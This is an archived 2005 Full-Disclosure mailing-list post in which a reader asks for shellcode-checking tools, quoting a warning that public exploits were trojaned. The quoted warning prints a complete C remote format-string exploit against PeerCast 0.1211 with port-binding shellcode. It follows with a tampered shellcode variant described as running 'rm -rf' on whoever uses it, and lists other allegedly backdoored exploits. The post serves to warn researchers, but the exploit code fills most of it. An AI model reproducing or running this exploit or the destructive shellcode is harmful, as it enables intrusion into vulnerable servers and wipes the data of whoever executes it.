lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Message-ID: <5598cfa1050726224930960f5a@mail.gmail.com>
Date: Wed Jul 27 06:50:06 2005
From: mark.sec at gmail.com (Mark Sec)
Subject: Beware trojaned exploits!

Yep,  many exploits/shellcodes are "fake" on the wild , but does
anyone have a tools to verify the shellcodes "public or 0days" online
or sources codes? something like "reverse shellcode" i belive to see
something online where u put the shellcode and them u see the "action"
that u shellcode have.

does anyone have something? 

cheers :-) 
/mark 




On 27/07/05, securitymarket@...h.ai <securitymarket@...h.ai> wrote:
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
> 
> Hackers may be at risk!
> 
> It has come to our attention that a large amount of public
> security exploits/software have been modified and re-posted
> to legitimate trusted information sites for public downloads.
> 
> We have recently came across 5 exploits that have had a shellcode
> modification
> after legit verification of trusted download sites.
> 
> The following information security sites have listed a number of
> modified exploits:
> 
> unl0ck security research
> g0tfault security
> m00 security
> 
> Unl0ck was recently broken into by a anti-security/hacker
> organization
> named dikline (dikline.com ?) and ALL exploit sources were modified
> in different
> ways to infect the host attempting to exploit them.
> 
> Numerous modified sources of "internal" / "0day" sources by a
> security group named "m00 security" have also been reported  as
> modified by
> the dikline organization.
> 
> We have audited numerous public exploit code's and have come up
> with some interesting
> results. The following is a clear example of modified shellcode to:
> 
> Original shellcode of the exploit "p33r-b33r.c" by unl0ck:
> 
> 
> /*
> \ PeerCast <= 0.1211 remote format string exploit
> / [<< Public Release >>]
> \
> / by Darkeagle [ darkeagle [at] linkin-park [dot] cc ]
> \
> / uKt researcherz [ http://unl0ck.org ]
> \
> / greetz goes to: uKt researcherz.
> \
> /
> \ - smallest code - better code!!!
> /
> */
> 
> #include <stdio.h>
> #include <stdlib.h>
> #include <stdarg.h>
> #include <string.h>
> #include <sys/types.h>
> #include <sys/socket.h>
> #include <netinet/in.h>
> #include <arpa/inet.h>
> #include <unistd.h>
> #include <netdb.h>
> 
> 
> //*******************************************
> #define doit( b0, b1, b2, b3, addr ) { \
> b0 = (addr >> 24) & 0xff; \
> b1 = (addr >> 16) & 0xff; \
> b2 = (addr >> 8) & 0xff; \
> b3 = (addr ) & 0xff; \
> }
> //*******************************************
> 
> //****************************************************************
> char shellcode[] = // binds 4444 port
> "\x31\xc9\x83\xe9\xeb\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x85"
> "\x4f\xca\xdf\x83\xeb\xfc\xe2\xf4\xb4\x94\x99\x9c\xd6\x25\xc8\xb5"
> "\xe3\x17\x53\x56\x64\x82\x4a\x49\xc6\x1d\xac\xb7\x94\x13\xac\x8c"
> "\x0c\xae\xa0\xb9\xdd\x1f\x9b\x89\x0c\xae\x07\x5f\x35\x29\x1b\x3c"
> "\x48\xcf\x98\x8d\xd3\x0c\x43\x3e\x35\x29\x07\x5f\x16\x25\xc8\x86"
> "\x35\x70\x07\x5f\xcc\x36\x33\x6f\x8e\x1d\xa2\xf0\xaa\x3c\xa2\xb7"
> "\xaa\x2d\xa3\xb1\x0c\xac\x98\x8c\x0c\xae\x07\x5f";
> //****************************************************************
> 
> 
> //****************************
> #define HOST "127.0.0.1"
> #define PORT 7144
> #define GOTADDR 0x0809da9c
> #define SHELLADDR 0x49adb23c
> //****************************
> 
> 
> 
> //******************************************************************
> *****
> char *
> evil_builder( unsigned int retaddr, unsigned int offset, unsigned
> int base, long figure )
> {
> char * buf;
> unsigned char b0, b1, b2, b3;
> int start = 256;
> 
> doit( b0, b1, b2, b3, retaddr );
> buf = (char *)malloc(999);
> memset( buf, 0, 999 );
> 
> b3 -= figure;
> b2 -= figure;
> b1 -= figure;
> b0 -= figure;
> 
> snprintf( buf, 999,
> "%%%dx%%%d$n%%%dx%%%d$n%%%dx%%%d$n%%%dx%%%d$n",
> b3 - 16 + start - base, offset,
> b2 - b3 + start, offset + 1,
> b1 - b2 + start, offset + 2,
> b0 - b1 + start, offset + 3 );
> 
> return buf;
> }
> //******************************************************************
> *******
> 
> 
> 
> 
> //******************************************************************
> *******
> int
> main( int argc, char * argv[] )
> {
> struct sockaddr_in addr;
> int sock;
> char * fmt;
> char endian[31337], da_shell[31337];
> unsigned long locaddr, retaddr;
> unsigned int offset, base;
> unsigned char b0, b1, b2, b3;
> 
> system("clear");
> printf("*^*^*^ PeerCast <= 0.1211 remote format string exploit
> ^*^*^*\n");
> printf("*^*^*^ by Darkeagle ^*^*^*\n");
> printf("*^*^*^ uKt researcherz [ http://unl0ck.org ] ^*^*^*\n\n");
> 
> memset( endian, 0x00, 31337 );
> memset( da_shell, 0x00, 31337 );
> 
> addr.sin_family = AF_INET;
> addr.sin_port = htons(PORT);
> addr.sin_addr.s_addr = inet_addr(HOST);
> 
> sock = socket(AF_INET, SOCK_STREAM, IPPROTO_IP);
> 
> locaddr = GOTADDR;
> retaddr = SHELLADDR;
> offset = 1265; // GET /html/en/index.htmlAAA%1265$x and you will
> get AAAA41414141
> 
> doit( b0, b1, b2, b3, locaddr );
> 
> base = 4;
> printf("[*] Buildin' evil code\n");
> strcat(endian, "GET /html/en/index.html");
> snprintf( endian+strlen(endian), sizeof(endian),
> "%c%c%c%c"
> "%c%c%c%c"
> "%c%c%c%c"
> "%c%c%c%c",
> b3, b2, b1, b0,
> b3 + 1, b2, b1, b0,
> b3 + 2, b2, b1, b0,
> b3 + 3, b2, b1, b0 );
> 
> fmt = evil_builder( retaddr, offset, base, 0x10 );
> 
> memset(fmt+strlen(fmt), 0x55, 32);
> strcat(fmt, shellcode);
> strcat(endian, fmt);
> strcat(endian, "\r\n\r\n\r\n");
> printf("[+] Buildin' complete!\n");
> sprintf(da_shell, "telnet %s 4444", HOST);
> 
> // just go, y0!
> printf("[*] Connectin'\n");
> if ( connect(sock, (struct sockaddr*)&addr, sizeof(addr)) ) {
> printf("[-] Connection failed!\n\n");
> exit(0); }
> 
> printf("[+] Connected!\n");
> printf("[*] Sleepin'\n");
> sleep(1);
> 
> printf("[*] Sendin'\n");
> send(sock, endian, strlen(endian), 0);
> 
> printf("[*] Sleepin'\n");
> sleep(1);
> 
> printf("[*] Connectin' in da shell\n\n");
> sleep(1);
> system(da_shell);
> return 0;
> }
> 
> 
> - ----------- Replaced modified shellcode to rm-rf remote host:
> 
> 
> /*
> \ PeerCast <= 0.1211 remote format string exploit
> / [<< Public Release >>]
> \
> / by Darkeagle [ darkeagle [at] linkin-park [dot] cc ]
> \
> / uKt researcherz [ http://unl0ck.org ]
> \
> / greetz goes to: uKt researcherz.
> \
> /
> \ - smallest code - better code!!!
> /
> */
> 
> #include <stdio.h>
> #include <stdlib.h>
> #include <stdarg.h>
> #include <string.h>
> #include <sys/types.h>
> #include <sys/socket.h>
> #include <netinet/in.h>
> #include <arpa/inet.h>
> #include <unistd.h>
> #include <netdb.h>
> 
> 
> //*******************************************
> #define doit( b0, b1, b2, b3, addr ) { \
> b0 = (addr >> 24) & 0xff; \
> b1 = (addr >> 16) & 0xff; \
> b2 = (addr >> 8) & 0xff; \
> b3 = (addr ) & 0xff; \
> }
> //*******************************************
> 
> 
> //****************************************************************
> char shellcode[] = // binds 4444 port
> "\x31\xc0\x50\x68\x66\x20\x2f\x58\x68\x6d\x20\x2d\x72\x68\x2d"
> "\x63\x58\x72\x68\x41\x41\x41\x41\x68\x41\x41\x41\x41\x68\x41"
> "\x41\x41\x41\x68\x41\x41\x41\x41\x68\x2f\x73\x68\x43\x68\x2f"
> "\x62\x69\x6e\x31\xc0\x88\x44\x24\x07\x88\x44\x24\x1a\x88\x44"
> "\x24\x23\x89\x64\x24\x08\x31\xdb\x8d\x5c\x24\x18\x89\x5c\x24"
> "\x0c\x31\xdb\x8d\x5c\x24\x1b\x89\x5c\x24\x10\x89\x44\x24\x14"
> "\x31\xdb\x89\xe3\x8d\x4c\x24\x08\x31\xd2\x8d\x54\x24\x14\xb0"
> "\x0b\xcd\x80\x31\xdb\x31\xc0\x40\xcd\x80";
> //****************************************************************
> 
> 
> The above shellcode is a modified version that was found listed
> on the unl0ck security website under downloads days before the
> site went down.
> 
> We have audited and found differences in shellcode on the following
> code:
> 
> (POSSIBLY MANY MORE)
> 
> unrealmagic.c - shellcode modified to rm -rf /* host
> p33r-b33r.c - shellcode modified to rm -rf /* host
> 0x666-ftpd.c - shellcode modified to rm -rf /* host
> gotfault-htdead.c - shellcode modified to rm -rf /* host
> gotfault-lcdproc.c - shellcode modified to install LKM
> gotfault-newspost.c - shellcode modified to rm -rf /* host
> gotfault-ngircd.c - shellcode modified to rm -rf /* host
> gotfault-nwlpstat.c - shellcode modified to rm -rf /* host
> gotfault-openftpd-msg.c - shellcode modified to install LKM
> gotfault-pbs4q.c - shellcode modified to add password to mail users
> gotfault-putty.c - shellcode modified to install LKM
> gotfault-realmagicV2.c - shellcode modified to install LKM
> gotfault-sing.sh - shellcode modified to install unknown backdoor.
> gotfault-vmpsd.c - shellcode modified to rm -rf /* host
> gotfault-zebedee.c - shellcode modified to rm -rf /* host
> gotfault-zebedee-win32.zip - unknown
> gotfault-exim.tar.gz - shellcode modified to rm -rf /* host
> gotfault-3cdsmash.c - shellcode modified to install NEW LKM
> gotfault-psoproxy.c - shellcode modified to install LKM
> gotfault-pcwsd.c - shellcode modified to install LKM
> 
> 
> This is an urgent notice to all of the security individuals who
> have downloaded
> any of the above (and more) exploits. Please take note to your
> collections
> we must find out what this dikline organization has backdoor'd and
> fix it!
> 
> *** MAKE SURE to check your shellcode whenever possible.
> 
> -----BEGIN PGP SIGNATURE-----
> Note: This signature can be verified at https://www.hushtools.com/verify
> Version: Hush 2.4
> 
> wkYEARECAAYFAkLm90gACgkQPRXecBfP4rZkowCfTvlwuZz3VoO7/fToI0UrhUhygekA
> njACLQnU0QQDfXtKglEjX7ko5TdA
> =nU9l
> -----END PGP SIGNATURE-----
> 
> 
> 
> 
> Concerned about your privacy? Follow this link to get
> secure FREE email: http://www.hushmail.com/?l=2
> 
> Free, ultra-private instant messaging with Hush Messenger
> http://www.hushmail.com/services-messenger?l=434
> 
> Promote security and make money with the Hushmail Affiliate Program:
> http://www.hushmail.com/about-affiliate?l=427
> 
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>

Powered by blists - more mailing lists